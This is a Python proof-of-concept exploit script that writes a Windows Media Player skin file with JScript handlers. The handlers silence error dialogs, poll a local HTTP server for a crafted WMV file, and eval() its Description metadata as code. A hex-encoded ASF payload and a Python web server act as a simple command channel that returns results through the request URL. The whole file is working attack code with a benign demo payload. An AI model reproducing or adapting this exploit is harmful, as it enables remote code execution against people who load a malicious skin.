wms_PoC.py

1. def random_payload():
2.     import random
3.  
4.     payloads = [
5.         bytes.fromhex('3026b2758e66cf11a6d900aa0062ce6c6907000000000000080000000102a1dcab8c47a9cf118ee400c00c205365680000000000000000000000000000000000000000000000170200000000000000803ed5deb19d010000000000000000c005d9010000000000000000000000001c0c00000000000002000000800c0000800c000058480300b503bf5f2ea9cf118ee300c00c205365e80000000000000011d2d3abbaa9cf118ee600c00c2053650600ba000000eacbf8c5af5b77488467aa8c44fa4ccaba000000000000000400000001000c000200020000004900730056004200520000000000000001001a0003000400000041007300700065006300740052006100740069006f005800000001000000000001001a0003000400000041007300700065006300740052006100740069006f00590000000100000000000100220003000400000056006900640065006f004f007200690065006e0074006100740069006f006e0000000000000040a4d0d207e3d21197f000a0c95ea850ba000000000000000300280057004d002f0045006e0063006f00640069006e006700530065007400740069006e0067007300000000001c004c00610076006600350037002e00340031002e0031003000300000000c0049007300560042005200000002000400000000002e004d00650064006900610046006f0075006e0064006100740069006f006e00560065007200730069006f006e00000000000c0032002e0031003100320000009107dcb7b7a9cf118ee600c00c2053658100000000000000c0ef19bc4d5bcf11a8fd00805f5c442b0057fb20555bcf11a8fd00805f5c442b000000000000000033000000000000000100000000000100000001000000022800280000000100000001000000010018004d50343303000000000000000000000000000000000000004052d1861d31d011a3a400a0c90348f64c000000000000004152d1861d31d011a3a400a0c90348f60100000001000a006d0073006d007000650067003400760033000000000004004d5034333326b2758e66cf11a6d900aa0062ce6ca4000000000000000000000000008200000070006c0061007900650072002e006c00610075006e0063006800550052004c0028002700680074007400700073003a002f002f007700770077002e0079006f00750074007500620065002e0063006f006d002f00770061007400630068003f0076003d0064005100770034007700390057006700580063005100270029003b00000074d40618dfca0945a4ba9aabcb96aae8b0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ce75f87b8d46d1118d82006097c9a2b2200000000000000001000100584803003626b2758e66cf11a6d900aa0062ce6c32000000000000000000000000000000000000000000000000000000000000000101')
6.     ]
7.     return random.choice(payloads)
8.  
9. def setup_listener():
10.     from subprocess import call
11.     call(["python", "-m", "http.server", "80"])
12.  
13. def generate_wms():
14.     wms = """<THEME>
15.     <VIEW
16.         title="PoC - @notwhickey"
17.         onload="JScript: view.timerInterval=5000;"
18.         ontimer="JScript: player.settings.enableErrorDialogs=false; function d(){ player.url='http://127.0.0.1/'+'exploit'+'.wmv?response='+view.title;}; d(); "
19.     >
20.         <player PlayState_onchange="JScript: try { view.title=eval(player.currentmedia.getItemInfo('Description'));} catch (e) {view.title=':(';} " />
21.         <VIDEO
22.             top = "69"
23.             left = "420"
24.             width = "1"
25.             height = "1"
26.         />
27.     </VIEW>
28. </THEME>
29. """
30.     with open('PoC.wms','w+') as poc:
31.         poc.write(wms)
32.  
33.     return
34.  
35. def create_c2_command():
36.     with open('exploit.wmv', 'wb') as c2:
37.         c2.write(random_payload())
38.  
39. def main():
40.     generate_wms()
41.     create_c2_command()
42.     setup_listener()
43.  
44. main()